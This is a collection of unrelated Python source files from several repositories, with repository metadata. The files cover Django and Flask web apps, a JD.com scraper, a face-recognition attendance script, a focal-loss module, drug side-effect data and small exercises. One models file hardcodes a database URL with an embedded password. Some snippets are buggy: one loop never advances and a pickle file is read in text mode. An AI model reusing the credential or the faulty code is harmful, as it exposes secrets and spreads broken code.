| null | 2022-12-08T02:58:15
| 2018-10-17T15:33:52
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 388
|
py
|
"""
WSGI config for mobsteer project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mob.settings")
application = get_wsgi_application()
|
[
"rcmiskin@Rickys-MBP.home"
] |
rcmiskin@Rickys-MBP.home
|
8a627ab100b1a10efe62ec889516607f57985524
|
fcde32709c62b8ee86da459bb7c8eee52c848118
|
/爬虫1905/day07/08_jdspider.py
|
49d7a558ca271312364fa910876ca9c11b9c08e5
|
[] |
no_license
|
klaus2015/py_base
|
6b92d362c3d7dc0e09205a037f4d580381dac94d
|
ec32c731c1c2f6a0dab87f1d167397e4fa86b8de
|
refs/heads/master
| 2022-07-28T15:49:30.383648
| 2020-05-11T15:31:43
| 2020-05-11T15:31:43
| 261,777,278
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,307
|
py
|
from selenium import webdriver
import time
class JdSpider(object):
def __init__(self):
self.url = 'https://www.jd.com/'
# 创建浏览器对象
self.browser = webdriver.Chrome()
# 跳转到商品详情页 - 爬虫书
def get_html(self):
# 找节点,send_keys() click()
so = '//*[@id="key"]'
button = '//*[@id="search"]/div/div[2]/button'
self.browser.get(self.url)
self.browser.find_element_by_xpath(so).send_keys('爬虫书')
self.browser.find_element_by_xpath(button).click()
# 必须的: 给页面留出加载时间
time.sleep(3)
# 匹配每个商品信息的li节点对象列表, li.text
def parse_html(self):
li_list = self.browser.find_elements_by_xpath('//*[@id="J_goodsList"]/ul/li')
for li in li_list:
L = li.text.split('\n')
if L[0].startswith('¥'):
price = L[0]
market = L[3]
elif L[0] == '单件':
price = L[3]
market = L[6]
elif '减' in L[0]:
price = L[1]
market = L[4]
print(price,market)
if __name__ == '__main__':
spider = JdSpider()
spider.get_html()
spider.parse_html()
|
[
"598467866@qq.com"
] |
598467866@qq.com
|
9d6863989f14208d6b0e7431896c90f5d1d86abe
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/nistData/atomic/gYear/Schema+Instance/NISTXML-SV-IV-atomic-gYear-minExclusive-1-3.py
|
13a8da359fe53d202c09bb9644b516f0c620a4c6
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917
| 2023-07-29T17:10:13
| 2023-07-30T12:11:13
| 239,622,251
| 2
| 0
|
MIT
| 2023-07-25T14:19:04
| 2020-02-10T21:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 326
|
py
|
from output.models.nist_data.atomic.g_year.schema_instance.nistschema_sv_iv_atomic_g_year_min_exclusive_1_xsd.nistschema_sv_iv_atomic_g_year_min_exclusive_1 import NistschemaSvIvAtomicGYearMinExclusive1
from xsdata.models.datatype import XmlPeriod
obj = NistschemaSvIvAtomicGYearMinExclusive1(
value=XmlPeriod("2019")
)
|
[
"tsoulloftas@gmail.com"
] |
tsoulloftas@gmail.com
|
7fa26d1ff2d3ce60a16bd25c9dc267f1607adfef
|
9823ee2b1905515c229fe071f9d1faabfd2d08df
|
/models.py
|
a03fac26b745ea74c81a405e03a36f52f92fecee
|
[] |
no_license
|
Basma1412L/Blood_Donation_System
|
775011e6943e42bb6095442a3109baeb344f9d96
|
d7bb2dcf0f41a41609ed549c128113f523a82365
|
refs/heads/main
| 2023-02-22T08:30:55.889663
| 2021-01-24T15:59:32
| 2021-01-24T15:59:32
| 331,435,541
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,958
|
py
|
import os
from sqlalchemy import Column, String, Integer, create_engine
from flask_sqlalchemy import SQLAlchemy
import json
from flask_migrate import Migrate
DB_HOST = os.getenv('DB_HOST', '127.0.0.1:5432')
DB_USER = os.getenv('DB_USER', '')
DB_PASSWORD = os.getenv('DB_PASSWORD', '')
DB_NAME = os.getenv('DB_NAME', 'blood_donation_system')
database_path = 'postgres://atyqejusvixadd:'
'9aeeb8c28abcc0c4f5be39e6f93fea50f3e962'
'f44b73ecfa6450260acb63289e@ec2-54-85-13-135.compute-1'
'.amazonaws.com:5432/dclm7h9kc6hijf'
db = SQLAlchemy()
'''
setup_db(app)
binds a flask application and a SQLAlchemy service
'''
def setup_db(app, database_path=database_path):
app.config["SQLALCHEMY_DATABASE_URI"] = database_path
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.app = app
db.init_app(app)
migrate = Migrate(app, db)
# db.create_all()
'''
Donor
'''
class Donor(db.Model):
id = Column(Integer, primary_key=True)
name = Column(String)
age = Column(Integer)
gender = Column(String)
address = Column(String)
phone = Column(String)
email = Column(String)
blood_type = Column(String)
donation = db.relationship(
'Donation', backref=db.backref(
'donor', cascade='all, delete'))
def __init__(self, name, age, gender, address, phone, email, blood_type):
self.name = name
self.age = age
self.gender = gender
self.address = address
self.phone = phone
self.email = email
self.blood_type = blood_type
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'name': self.name,
'age': self.age,
'gender': self.gender,
'address': self.address,
'phone': self.phone,
'email': self.email,
'blood_type': self.blood_type
}
'''
Donation
'''
class Donation(db.Model):
id = Column(Integer, primary_key=True)
blood_type = db.Column(db.String)
time = db.Column(db.DateTime())
donor_id = db.Column(db.Integer, db.ForeignKey('donor.id'))
donationCenter_id = db.Column(
db.Integer, db.ForeignKey('donation_center.id'))
def __init__(self, donor_id, blood_type, time, donationCenter_id):
self.donor_id = donor_id
self.blood_type = blood_type
self.time = time
self.donationCenter_id = donationCenter_id
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'donor_id': self.donor_id,
'blood_type': self.blood_type,
'donationCenter_id': self.donationCenter_id,
'time': self.time
}
'''
Donation Center
'''
class DonationCenter(db.Model):
id = Column(Integer, primary_key=True)
name = db.Column(db.String)
address = db.Column(db.String)
donations = db.relationship(
'Donation',
backref=db.backref(
'donation_center',
cascade='all, delete'))
appointments = db.relationship(
'Appointment', backref=db.backref(
'donation_center', cascade='all, delete'))
def __init__(self, name, address):
self.name = name,
self.address = address
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'name': self.name,
'address': self.address
}
'''
Appointment
'''
class Appointment(db.Model):
id = Column(Integer, primary_key=True)
donations_center = db.Column(
db.Integer, db.ForeignKey('donation_center.id'))
time = db.Column(db.DateTime())
donors_limit = db.Column(db.Integer)
availibility = db.Column(db.Boolean, default=True)
def __init__(self, donations_center, time, donors_limit, availibility):
self.donations_center = donations_center
self.time = time
self.donors_limit = donors_limit
self.availibility = availibility
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'donations_center': self.donations_center,
'time': self.time
}
class AppointmentsDonors(db.Model):
id = db.Column(db.Integer, primary_key=True)
donor_id = db.Column(db.Integer, db.ForeignKey('donor.id'))
appointment_id = db.Column(db.Integer, db.ForeignKey('appointment.id'))
donor = db.relationship(
Donor,
backref=db.backref(
'appointments_donors',
cascade='all, delete'))
appointment = db.relationship(
Appointment,
backref=db.backref(
'appointments_donors',
cascade='all, delete'))
def __init__(self, donor_id, appointment_id):
self.donor_id = donor_id
self.appointment_id = appointment_id
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'appointment_id': self.appointment_id,
'donor_id': self.donor_id
}
|
[
"basmammahdy@gmail.com"
] |
basmammahdy@gmail.com
|
ca6c7e77fc32b7483caab1e3fe8a5f47790e471a
|
4702d2b5aac63b8179b47d946837965664824406
|
/mmdet/models/losses/pfocal_loss.py
|
3ffb3ad6c1ec1d84c6d6bb374c331d930946e6c2
|
[
"Apache-2.0"
] |
permissive
|
ruiningTang/mmdetection
|
551bf276ee581667703cbe89c2872dc8e7f43bb8
|
100b0b5e0edddc45af0812b9f1474493c61671ef
|
refs/heads/master
| 2021-12-02T05:58:03.301831
| 2021-11-20T10:58:35
| 2021-11-20T10:58:35
| 387,680,731
| 0
| 0
|
Apache-2.0
| 2021-07-20T05:20:10
| 2021-07-20T05:20:09
| null |
UTF-8
|
Python
| false
| false
| 6,835
|
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.ops import sigmoid_focal_loss as _sigmoid_focal_loss
from ..builder import LOSSES
from .utils import weight_reduce_loss
# This method is only for debugging
def py_sigmoid_focal_loss(pred,
target,
weight=None,
gamma=2.0,
alpha=0.25,
reduction='mean',
avg_factor=None):
"""PyTorch version of `Focal Loss <https://arxiv.org/abs/1708.02002>`_.
Args:
pred (torch.Tensor): The prediction with shape (N, C), C is the
number of classes
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): Sample-wise loss weight.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'.
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
"""
pred_sigmoid = pred.sigmoid()
target = target.type_as(pred)
pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)
focal_weight = (alpha * target + (1 - alpha) *
(1 - target)) * pt.pow(gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight
loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss
def sigmoid_focal_loss(pred,
target,
weight=None,
gamma=2.0,
alpha=0.25,
reduction='mean',
avg_factor=None):
r"""A warpper of cuda version `Focal Loss
<https://arxiv.org/abs/1708.02002>`_.
Args:
pred (torch.Tensor): The prediction with shape (N, C), C is the number
of classes.
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): Sample-wise loss weight.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'. Options are "none", "mean" and "sum".
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
"""
# Function.apply does not accept keyword arguments, so the decorator
# "weighted_loss" is not applicable
loss = _sigmoid_focal_loss(pred.contiguous(), target, gamma, alpha, None,
'none')
if weight is not None:
if weight.shape != loss.shape:
if weight.size(0) == loss.size(0):
# For most cases, weight is of shape (num_priors, ),
# which means it does not have the second axis num_class
weight = weight.view(-1, 1)
else:
# Sometimes, weight per anchor per class is also needed. e.g.
# in FSAF. But it may be flattened of shape
# (num_priors x num_class, ), while loss is still of shape
# (num_priors, num_class).
assert weight.numel() == loss.numel()
weight = weight.view(loss.size(0), -1)
assert weight.ndim == loss.ndim
loss = weight_reduce_loss(loss, weight, reduction, avg_factor)
return loss
@LOSSES.register_module()
class ProgressiveFocalLoss(nn.Module):
def __init__(self,
use_sigmoid=True,
gamma=2.0,
delta=0.5,
w=0.5,
reduction='mean',
loss_weight=1.0):
"""`Focal Loss <https://arxiv.org/abs/1708.02002>`_
Args:
use_sigmoid (bool, optional): Whether to the prediction is
used for sigmoid or softmax. Defaults to True.
gamma (float, optional): The gamma for calculating the modulating
factor. Defaults to 2.0.
alpha (float, optional): A balanced form for Focal Loss.
Defaults to 0.25.
reduction (str, optional): The method used to reduce the loss into
a scalar. Defaults to 'mean'. Options are "none", "mean" and
"sum".
loss_weight (float, optional): Weight of loss. Defaults to 1.0.
"""
super(ProgressiveFocalLoss, self).__init__()
assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'
self.use_sigmoid = use_sigmoid
self.delta = delta
self.w = w
self.gamma = gamma
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self,
pred,
target,
weight=None,
avg_factor=None,
reduction_override=None,
lvl_gamma=None):
"""Forward function.
Args:
pred (torch.Tensor): The prediction.
target (torch.Tensor): The learning label of the prediction.
weight (torch.Tensor, optional): The weight of loss for each
prediction. Defaults to None.
avg_factor (int, optional): Average factor that is used to average
the loss. Defaults to None.
reduction_override (str, optional): The reduction method used to
override the original reduction method of the loss.
Options are "none", "mean" and "sum".
Returns:
torch.Tensor: The calculated loss
"""
assert reduction_override in (None, 'none', 'mean', 'sum')
reduction = (
reduction_override if reduction_override else self.reduction)
gamma = lvl_gamma.clamp_(min=self.gamma-self.delta, max=self.gamma+self.delta)
alpha = self.w / gamma
if self.use_sigmoid:
loss_cls = self.loss_weight * sigmoid_focal_loss(
pred,
target,
weight,
gamma=gamma.cpu().numpy().tolist(),
alpha=alpha.cpu().numpy().tolist(),
reduction=reduction,
avg_factor=avg_factor)
else:
raise NotImplementedError
return loss_cls
|
[
"tangruining@zju.edu.cn"
] |
tangruining@zju.edu.cn
|
b91107ea3d3c0cf28d14602b6175a807977c061b
|
b39d9ef9175077ac6f03b66d97b073d85b6bc4d0
|
/Celvapan_WC500022670.py
|
3ae311ad14e8fd68fa2f9441794de9d776f12aab
|
[] |
no_license
|
urudaro/data-ue
|
2d840fdce8ba7e759b5551cb3ee277d046464fe0
|
176c57533b66754ee05a96a7429c3e610188e4aa
|
refs/heads/master
| 2021-01-22T12:02:16.931087
| 2013-07-16T14:05:41
| 2013-07-16T14:05:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,329
|
py
|
{'_data': [['Uncommon',
[['Psychiatric',
u'(>1/1 000, < 1/100), s\xe4llsynta (>1/10 000, < 1/1 000), mycket s\xe4llsynta (< 1/10 000)'],
['Psychiatric',
u'(\u22651/1 000, < 1/100), s\xe4llsynta (\u22651/10 000, < 1/1 000), mycket s\xe4llsynta (< 1/10 000) \uf0b7Kliniska pr\xf6vningar med en version av Celvapan inneh\xe5llande en H5N1-vaccinstam Kliniska pr\xf6vningar utf\xf6rdes med en version av Celvapan inneh\xe5llande en H5N1-vaccinstam (se avsnitt 5.1) hos cirka 3 700 personer (i \xe5ldrarna 18 till 60 \xe5r och \xf6ver), och i grupper med s\xe4rskild risk p\xe5 cirka 300 personer var best\xe5ende av personer med nedsatt immunf\xf6rsvar och patienter med kroniska sjukdomstillst\xe5nd. De flesta av reaktionerna var lindriga till sin art, kortvariga och kvalitativt likartade dem som framkallas av influensavacciner. Det f\xf6rekom f\xe4rre reaktioner efter den andra dosen j\xe4mf\xf6rt med den f\xf6rsta dosen. S\xe4kerhetsprofilen f\xf6r friska personer > 60 \xe5rs \xe5lder, personer med nedsatt immunf\xf6rsvar och patienter med kroniska sjukdomstillst\xe5nd liknar s\xe4kerhetsprofilen f\xf6r friska f\xf6rs\xf6kspersoner. \uf0b7Uppf\xf6ljning efter marknadsintroduktion']]],
['Unknown',
[['Psychiatric',
u'CENTRALA OCH PERIFERA Huvudv\xe4rk Mycket vanliga NERVSYSTEMET Yrsel Vanliga \xd6GON \xd6gonirritation Vanliga ANDNINGSV\xc4GAR, BR\xd6STKORG Faryngolaryngeal sm\xe4rta Vanliga OCH MEDIASTINUM MAGTARMKANALEN Buksm\xe4rta Vanliga HUD OCH SUBKUTAN V\xc4VNAD Hyperhidros Vanliga Utslag Vanliga N\xe4sselutslag Vanliga MUSKULOSKELETALA SYSTEMET Artralgi Vanliga OCH BINDV\xc4V Myalgi Vanliga ALLM\xc4NNA SYMTOM OCH/ELLER Utmattning Mycket vanliga SYMTOM VID Pyrexi Vanliga ADMINISTRERINGSST\xc4LLET Frossa Vanliga Sjukdomsk\xe4nsla Vanliga Reaktioner p\xe5 injektionsst\xe4llet Vanliga \uf0b7Sm\xe4rta p\xe5 injektionsst\xe4llet Vanliga \uf0b7F\xf6rh\xe5rdnad p\xe5 injektionsst\xe4llet Vanliga \uf0b7Erytem p\xe5 injektionsst\xe4llet Vanliga \uf0b7Svullnad av injektionsst\xe4llet Vanliga F\xf6rs\xe4mrad r\xf6relsef\xf6rm\xe5ga p\xe5 \uf0b7 Vanliga injektionsst\xe4llet Biverkningsfrekvens \xe4r baserad p\xe5 f\xf6ljande skala: Mycket vanliga (\u22651/10); vanliga (\u22651/100, < 1/10),'],
['Psychiatric',
u'Rastl\xf6shet -Vanliga CENTRALA OCH PERIFERA Huvudv\xe4rk Vanliga Vanliga Vanliga NERVSYSTEMET Gr\xe5t --Vanliga S\xf6mnighet --Vanliga \xd6RON OCH BALANSORGAN Yrsel Vanliga ANDNINGSV\xc4GAR, Hosta - -Vanliga BR\xd6STKORG OCH MEDIASTINUM MAGTARMKANALEN Buksm\xe4rta Vanliga -Vanliga Illam\xe5ende Vanliga -Vanliga Uppkastning Vanliga Vanliga Vanliga Diarr\xe9 -Vanliga Vanliga HUD OCH SUBKUTAN Hyperhidros --Vanliga V\xc4VNAD Utslag --Vanliga MUSKULOSKELETALA Myalgi Vanliga SYSTEMET OCH BINDV\xc4V Sm\xe4rta i extremiteter Vanliga ALLM\xc4NNA SYMTOM Utmattning -Vanliga OCH/ELLER SYMTOM VID Pyrexi -Vanliga Mycket vanliga ADMINISTRERINGSST\xc4LLET Frossa Vanliga Vanliga Vanliga Retlighet --Vanliga Sjukdomsk\xe4nsla --Vanliga Reaktioner p\xe5 injektionsst\xe4llet \uf0b7Sm\xe4rta p\xe5 Mycket Vanliga Vanliga injektionsst\xe4llet vanliga \uf0b7F\xf6rh\xe5rdnad p\xe5 Vanliga Vanliga Vanliga injektionsst\xe4llet \uf0b7Erytem p\xe5 Vanliga Vanliga Vanliga injektionsst\xe4llet \uf0b7Svullnad av Vanliga Vanliga Vanliga injektionsst\xe4llet Biverkningsfrekvens \xe4r baserad p\xe5 f\xf6ljande skala: Mycket vanliga (\u22651/10); vanliga (\u22651/100, < 1/10),'],
['Immune system', u'Anafylaktisk reaktion*, \xf6verk\xe4nslighet*'],
['Nervous system', u'Feberkramp Hypestesi'],
['Skin',
u'Angio\xf6dem *S\xe5dana reaktioner har manifesterats som andn\xf6d, hypotoni, takykardi, takypn\xe9, cyanos, pyrexi, vallningar, angio\xf6dem och urtikaria'],
['Musculoskeletal',
u'Sm\xe4rta i extremitet (i de flesta fall rapporterade som sm\xe4rta i den injicerade armen)'],
['General',
u'Influensaliknande sjukdom Trivalenta s\xe4songsbundna influensavacciner I uppf\xf6ljning efter marknadsintroduktion med \xe4ggderiverade trivalenta s\xe4songsbundna influensavacciner har f\xf6ljande allvarliga biverkningar rapporterats']]]],
'_pages': [4, 8],
u'_rank': 9,
u'_type': u'LSFU'}
|
[
"urudaro@gmail.com"
] |
urudaro@gmail.com
|
5af92f6c9ff966280122d746dd74c3c2644561f3
|
96633439f9b6d22878a78cf8307077bd559fc0cb
|
/A Byte of Python/pickling.py
|
2c2838b39a658a056628c22cb5d6c33964eb8c33
|
[] |
no_license
|
peter-chen-meihua/python
|
67299eb0a7e11f1773ebaa6d3ceeb06587688b7b
|
bbaf9dc29e19c24c246bd3640f26460e3b3d964f
|
refs/heads/master
| 2021-01-17T10:23:45.969384
| 2016-06-21T08:01:50
| 2016-06-21T08:01:50
| 58,113,271
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Filename: pickling.py
import pickle as p
# import pickle as p
shoplistfile = 'shoplist.data'
# the name of the file where we will store the obect
shoplist = ['apple','mango','carrot']
# Write to the file
f = open(shoplistfile,'wb')
p.dump(shoplist,f) # dump the object to a file
f. close()
del shoplist # remove the shoplist
# Read back from the storage
f = open(shoplistfile,'r')
storedlist = p.load(f)
print(storedlist)
|
[
"peter.chen@meihua.info"
] |
peter.chen@meihua.info
|
418fd1fa2ace0a47bf8e9fcdb74cb133ba3d3bf6
|
0a7092fd1ad3e106169ec173d4c4db5e1e8a5114
|
/Recogniser.py
|
2c45f5320cdf7eef3faae5a3c748c40c12d98738
|
[] |
no_license
|
aryan2511/Face-Recognition-Attendance-System-
|
7bff48ae8858e3d34166ae3e4dc6e36ca300b79b
|
997fa148e4e584c5e30c6ab78222cc7a1667544d
|
refs/heads/main
| 2023-07-29T08:55:18.214715
| 2021-09-16T05:08:00
| 2021-09-16T05:08:00
| 381,926,080
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,452
|
py
|
import cv2
import numpy as np;
import xlwrite
#import firebase.firebase_ini as fire;
import time
import sys
from playsound import playsound
start = time.time()
period = 8
face_cas = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0);
recognizer = cv2.face.LBPHFaceRecognizer_create();
recognizer.read('G:\Projects\MiniProj_\Trainer.yml')
flag = 0;
id = 0;
filename = 'filename';
dict = {'item1': 1}
font = cv2.FONT_HERSHEY_SIMPLEX
while True:
ret, img = cap.read();
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY);
faces = face_cas.detectMultiScale(gray, 1.3, 7);
for (x, y, w, h) in faces:
roi_gray = gray[y:y + h, x:x + w]
cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2);
id, conf = recognizer.predict(roi_gray)
if (conf < 50):
if (id == 1):
id = 'Aryan Bose'
if ((str(id)) not in dict):
filename = xlwrite.output('attendance', 'class1', 1, id, 'yes');
dict[str(id)] = str(id);
elif (id == 2):
id = 'Abhiraj Daddi'
if ((str(id)) not in dict):
filename = xlwrite.output('attendance', 'class1', 2, id, 'yes');
dict[str(id)] = str(id);
elif (id == 3):
id = 'Kaushal'
if ((str(id)) not in dict):
filename = xlwrite.output('attendance', 'class1', 3, id, 'yes');
dict[str(id)] = str(id);
elif (id == 4):
id = 'Sonali Bose'
if ((str(id)) not in dict):
filename = xlwrite.output('attendance', 'class1', 4, id, 'yes');
dict[str(id)] = str(id);
else:
id = 'Unknown, can not recognize'
flag = flag + 1
break
cv2.putText(img, str(id) + " " + str(conf), (x, y - 10), font, 0.55, (120, 255, 120), 1)
# cv2.cv.PutText(cv2.cv.fromarray(img),str(id),(x,y+h),font,(0,0,255));
cv2.imshow('frame', img);
# cv2.imshow('gray',gray);
if flag == 10:
playsound('transactionSound.mp3')
print("Transaction Blocked")
break;
if time.time() > start + period:
break;
if cv2.waitKey(100) & 0xFF == ord('q'):
break;
cap.release();
cv2.destroyAllWindows();
|
[
"noreply@github.com"
] |
aryan2511.noreply@github.com
|
4dada9e265e846a20d45a26020f70ca767cf8fce
|
29d7126b822aa7ba8159d620177af71830c999de
|
/web3sr/settings.py
|
34fb9a539b7263d3db26e2a8a864d2cc63106871
|
[] |
no_license
|
roubin/web3sr
|
ecc797d4e7b42706c9b14282e81a8853ab0200f5
|
04a6cd58968e056fa2bbca19edebb794e4cc711e
|
refs/heads/master
| 2021-09-09T05:03:31.954046
| 2019-11-20T14:44:19
| 2019-11-20T14:44:19
| 162,558,783
| 0
| 0
| null | 2021-09-08T00:39:50
| 2018-12-20T09:44:38
|
Python
|
UTF-8
|
Python
| false
| false
| 3,717
|
py
|
"""
Django settings for web3sr project.
Generated by 'django-admin startproject' using Django 2.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ['SECRET_KEY'] # 3j*whbe7_=abwo*^ug+8_yu-&j7yye2)$1=&45ih@)%@l9wnty
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ["127.0.0.1", "web3sr.herokuapp.com"]
# Application definition
INSTALLED_APPS = [
'publi.apps.PubliConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'web3sr.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'web3sr.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
# where to collect
STATICFILES_DIRS = (os.path.join(PROJECT_ROOT, 'static'), )
# where to look for
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')
# database for heroku
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
|
[
"emmanuel.roubin@univ-grenoble-alpes.fr"
] |
emmanuel.roubin@univ-grenoble-alpes.fr
|
c792b0da09bba8ff714d4777ea33653fc69e8687
|
98679345dc531f76f39b59ee1979ca719cae97a0
|
/webapp/apps/posts/urls.py
|
9a304b7eccc8e4da89204ff9297cddb44239ab4e
|
[] |
no_license
|
jpennell/jamespennell.com
|
215122764629c31c98510c54f2491f790f880d0e
|
a247600cd989bf5319b421a8ad72baeb5d9f6746
|
refs/heads/master
| 2016-09-05T21:28:42.589509
| 2012-09-19T01:42:35
| 2012-09-19T01:42:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 269
|
py
|
#Django
from django.conf.urls import patterns, url
urlpatterns = patterns('webapp.apps.posts.views',
url(r'^$', 'list', name='blog'),
url(r'^(?P<page_id>\d+)/$', 'list', name="post-list"),
url(r'^posts/(?P<post_id>\d+)/$', 'detail', name="post-detail"),
)
|
[
"pennell.james@gmail.com"
] |
pennell.james@gmail.com
|
23778bba08ea8b9dc909bcc66d74340cc091cceb
|
32cc5fe0dd9376f9f7211f6defe3100cfdc10b3c
|
/List/processing.py
|
8990bdf1b3d73ddd015e53b8f9d5d65ee8405eeb
|
[] |
no_license
|
RegCookies/Offer-Sward
|
601bb16d107027599de1376db76435875d6525e7
|
82cff33aee421a2e4288e8d21ea3a54a8834a8ec
|
refs/heads/master
| 2020-03-31T00:35:20.246454
| 2018-12-10T13:59:29
| 2018-12-10T13:59:29
| 151,746,368
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 884
|
py
|
def process(t,n):
if t == None or n <= 0:
return None
m = len(t)
proTime = [0]* m
i = 0
while i < n:
minTime = proTime[0] + t[0]
minIndex = 0
j = 1
while j < m:
if minTime > proTime[j] + t[j]:
minTime = proTime[j] + t[j]
minIndex = j
j +=1
proTime[minIndex] += t[minIndex]
return proTime
if __name__ == "__main__":
t = [7,10]
n = 6
protime = process(t,n)
if protime == None:
print("ERROR")
else:
totalTime = protime[0]
i = 0
while i <len(protime):
print("第" + str(i+1) + "台服务器有" + str(protime[i]/t[i]) + "总执行时间"+ str(protime[i]))
if protime[i] > totalTime:
totalTime = protime[i]
i+=1
print(str(totalTime))
ç
|
[
"noreply@github.com"
] |
RegCookies.noreply@github.com
|
f4b12586bf9abd4c4663188c7cbc292cee8136ef
|
575240d2b0fd35949b22e1ce5760d2a3138198d3
|
/model/gen_discr.py
|
23c6c8bfebfed38c57d27381b4cf634d42486a2c
|
[] |
no_license
|
rosasha/GAN_PROJECT_Pix2Pix
|
9805afa143ec61353fca83cd1a7357803940e7b9
|
1c9413042866c8a5eff69e871e0359095f0edbcc
|
refs/heads/main
| 2023-06-09T15:41:19.599604
| 2021-06-28T19:49:06
| 2021-06-28T19:49:06
| 380,448,210
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,722
|
py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import torch
import torch.nn as nn
# In[2]:
class CBlock(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=4, stride=2, padding=1, act=True, batch_norm=True):
